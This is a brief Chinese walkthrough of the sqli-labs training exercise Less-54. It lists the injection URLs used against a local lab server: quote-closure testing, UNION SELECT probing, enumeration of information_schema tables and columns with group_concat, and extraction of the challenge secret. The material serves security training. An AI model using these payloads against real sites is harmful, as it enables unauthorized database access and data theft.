尝试的次数只有10次
http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1'
单引号报错,错误信息没有显示
加注释符页面恢复正常,判断为单引号闭合
http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=1'%23
通过页面信息可以判断查询的表至少有id,username,password三个字段,所以union select至少应该select3个字段
http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0' union select 1,user(),database()%23
用group_concat函数连接所有表名
http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='challenges'%23
只有一张表,查列名
http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='challenges' and table_name='13KLHT1VHR'%23
查询数据
http://192.168.136.128/sqli-labs-master/Less-54/index.php?id=0' union select 1,secret_R03R,tryy from 13KLHT1VHR limit 0,1%23
提交
成功
